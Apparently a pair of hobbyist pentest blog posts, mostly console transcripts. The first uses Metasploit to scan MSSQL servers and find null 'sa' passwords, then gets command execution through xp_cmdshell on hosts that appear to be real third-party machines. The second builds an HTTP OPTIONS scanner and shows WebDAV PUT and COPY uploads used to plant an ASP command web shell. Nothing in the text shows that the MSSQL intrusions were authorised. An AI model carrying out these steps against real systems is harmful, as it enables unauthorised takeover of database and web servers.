Open ms-sql-s[ 1433] From A.B.Z.58 ttl 44
Open ms-sql-s[ 1433] From A.B.Z.91 ttl 107
Open ms-sql-s[ 1433] From A.B.Z.141 ttl 109
Open ms-sql-s[ 1433] From A.B.Z.156 ttl 107
Open ms-sql-s[ 1433] From A.B.Y.170 ttl 107
Open ms-sql-s[ 1433] From A.B.Z.184 ttl 108

run those hosts that respond through the msf auxillary module mssql_ping to see if we can get any version information. I'll omit the ones that didnt respond.


cg@segfault:~/evil/msf3$ ./msfconsole

=[ msf v3.1-dev
+ -- --=[ 218 exploits - 107 payloads
+ -- --=[ 17 encoders - 5 nops
=[ 41 aux

msf > use auxiliary/scanner/mssql/mssql_
use auxiliary/scanner/mssql/mssql_login
use auxiliary/scanner/mssql/mssql_ping
msf > use auxiliary/scanner/mssql/mssql_ping
msf auxiliary(mssql_ping) > info

Name: MSSQL Ping Utility
Version: 4419

Provided by:
MC

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
THREADS 1 yes The number of concurrent threads

Description:
This module simply queries the MSSQL instance for information.

msf auxiliary(mssql_ping) > set RHOSTS A.B.X.28
RHOSTS => A.B.X.28
msf auxiliary(mssql_ping) > run
[*] SQL Server information for A.B.X.28:
[*] tcp = 1433
[*] np = \\ABCDEF\pipe\\sql\query
[*] Version = 8.00.194
[*] ServerName = JADER
[*] IsClustered = No
[*] InstanceName = MSSQLSERVER
[*] Auxiliary module execution completed

msf auxiliary(mssql_ping) > set RHOSTS A.B.C.30
RHOSTS => A.B.C.30
msf auxiliary(mssql_ping) > run
[*] SQL Server information for A.B.C.30:
[*] tcp = 1433
[*] np = \\ABC-SERVER\pipe\\sql\query
[*] Version = 8.00.194
[*] ServerName = DTI-SERVER
[*] IsClustered = No
[*] InstanceName = MSSQLSERVER
[*] Auxiliary module execution completed
msf auxiliary(mssql_ping) > set RHOSTS A.B.Y.170
RHOSTS => A.B.Y.170
msf auxiliary(mssql_ping) > run
[*] SQL Server information for A.B.Y.170:
[*] tcp = 1433
[*] np = \\ABCDEF\pipe\sql\query
[*] Version = 8.00.194
[*] ServerName = SERVIDOR
[*] IsClustered = No
[*] InstanceName = MSSQLSERVER
[*] Auxiliary module execution completed

Now, lets run them thru mssql_login to look for any that have null sa accounts.

msf > use auxiliary/scanner/mssql/mssql_login
msf auxiliary(mssql_login) > info

Name: MSSQL Login Utility
Version: 4749

Provided by:
MC

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
RPORT 1433 yes The target port
THREADS 1 yes The number of concurrent threads

Description:
This module simply queries the MSSQL instance for a null SA account.

msf auxiliary(mssql_login) > set RHOSTS A.B.X.28
RHOSTS => A.B.X.28
msf auxiliary(mssql_login) > run
[*] Target A.B.X.28 DOES have a null sa account!
[*] Auxiliary module execution completed
msf auxiliary(mssql_login) > set RHOSTS A.B.Y.170
RHOSTS => A.B.Y.170
msf auxiliary(mssql_login) > run
[*] Target A.B.Y.170 does not have a null sa account...
[*] Auxiliary module execution completed
msf auxiliary(mssql_login) > set RHOSTS A.B.C.30
RHOSTS => A.B.C.30
msf auxiliary(mssql_login) > run
[*] Target A.B.C.30 DOES have a null sa account!
[*] Auxiliary module execution completed

then lets use sqlcmd to see if we can get a command shell on the box. sqlcmd uses the xp_cmdshell to execute commands.

cg@segfault:~/evil/db$ ./sqlcmd A.B.X.28:1433
connected to host A.B.X.28:1433 as user sa!
exit with CTRL+C

sqlcmd> ipconfig

Configuratio de IP do Windows


Adaptador Ethernet Conexto local:
Estado da media . . . . . . . . . . . : media desconectada

Adaptador Ethernet Conexto de rede sem fio:
Estado da media . . . . . . . . . . . : media desconectada

Adaptador PPP POP:
Sufixo DNS especsfico de conexto. :
Endereo IP . . . . . . . . . . . . : A.B.X.28
Mascara de sub-rede . . . . . . . . : 255.255.255.255
Gateway padro. . . . . . . . . . . : A.B.X.28

OR

cg@segfault:~/evil/db$ ./sqlcmd A.B.C.30:1433
connected to host A.B.C.30:1433 as user sa!
exit with CTRL+C

sqlcmd> ipconfig

Configurato de IP do Windows


Adaptador Ethernet Local:

Sufixo DNS especfico de conexto . :
Endereo IP . . . . . . . . . . . . : 192.168.2.5
Mascara de sub-rede . . . . . . . . : 255.255.255.0
Gateway padro. . . . . . . . . . . :

Adaptador Ethernet remoto:

Sufixo DNS especfico de conexto . :
Endereo IP . . . . . . . . . . . . : 192.168.2.6
Mascara de sub-rede . . . . . . . . : 255.255.255.0
Gateway padro. . . . . . . . . . . : 192.168.2.1

TFTP was available on both boxes for some some old school YR 2000 tftp upload your tools fun.

Links:
MSSQL Version chart: http://www.sqlteam.com/article/sql-server-versions

sqlcmd.c: http://excluded.wgv.at/codedstuff.php

metasploit (like you need the link): http://framework.metasploit.com/

-CG

Creating a HTTP OPTIONS auxiliary module for Metasploit

Inspired by HD's HTTP version auxiliary module i wanted to see if i could get one going that would be pull down the HTTP Verbs allowable on a web server.

Basically i wanted to do:

cg@segfault:~/evil/msf3$ nc 192.168.0.109 80
OPTIONS * HTTP/1.0

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Aug 2007 05:18:55 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 0
Accept-Ranges: bytes
DASL:
DAV: 1,2
Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Cache-Control: private

cg@segfault:~/evil/msf3$

but with a metasploit auxiliary module. so i got it going... mostly HD's module but i changed what needed to be changed to get it to work.

cg@segfault:~/evil/msf3$ ./msfconsole

____________
<>
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *


=[ msf v3.1-dev
+ -- --=[ 215 exploits - 107 payloads
+ -- --=[ 17 encoders - 5 nops
=[ 41 aux

msf > use auxiliary/scanner/http/options
msf auxiliary(options) > set RHOSTS 192.168.0.109
RHOSTS => 192.168.0.109
msf auxiliary(options) > run
[*] 192.168.0.109 allows OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH methods
[*] Auxiliary module execution completed
msf auxiliary(options) > set RHOSTS www.carnal0wnage.com
RHOSTS => www.carnal0wnage.com
msf auxiliary(options) > run
[*] 69.64.54.104 allows GET,HEAD,POST,OPTIONS,TRACE methods
[*] Auxiliary module execution completed
msf auxiliary(options) >

i'll post the code on carnal0wnage when i get off my butt and a little something something that gives you a status if you are scanning a Class C.

**more on getting code on the box once you find a PUT

cg@segfault:~$ curl -T test.txt http://192.168.0.109/test.txt http://192.168.0.109

then you have to do a MOVE or COPY request. personally i was having issues getting a MOVE request to work with a netcat connection, so i used...

**UPDATE
it ended up being the carriage returns (or lack thereof) that was causing me to get a 400 Bad Request error. I couldnt get the MOVE command to work, but the COPY command did.

cadaver http://www.webdav.org/cadaver/

cg@segfault:~$ cadaver
dav:!> open http://192.168.0.109
dav:/> put upload.asp
Uploading upload.asp to `/upload.asp':
Progress: [=============================>] 100.0% of 1635 bytes failed:
404 Not Found
dav:/> put upload.txt
Uploading upload.txt to `/upload.txt':
Progress: [=============================>] 100.0% of 492 bytes succeeded.
dav:/> copy upload.txt upload.asp
Copying `/upload.txt' to `/upload.asp': succeeded.
dav:/> put upload.inc
Uploading upload.inc to `/upload.inc':
Progress: [=============================>] 100.0% of 5062 bytes succeeded.
dav:/> exit

from there you will want to upload your cmd.asp so you can execute commands on the box.


Browsing to upload.asp and uploading our cmd.asp (cmdx.aspx)



Interacting with out cmdx.aspx to list the directory contents of the C drive


-CG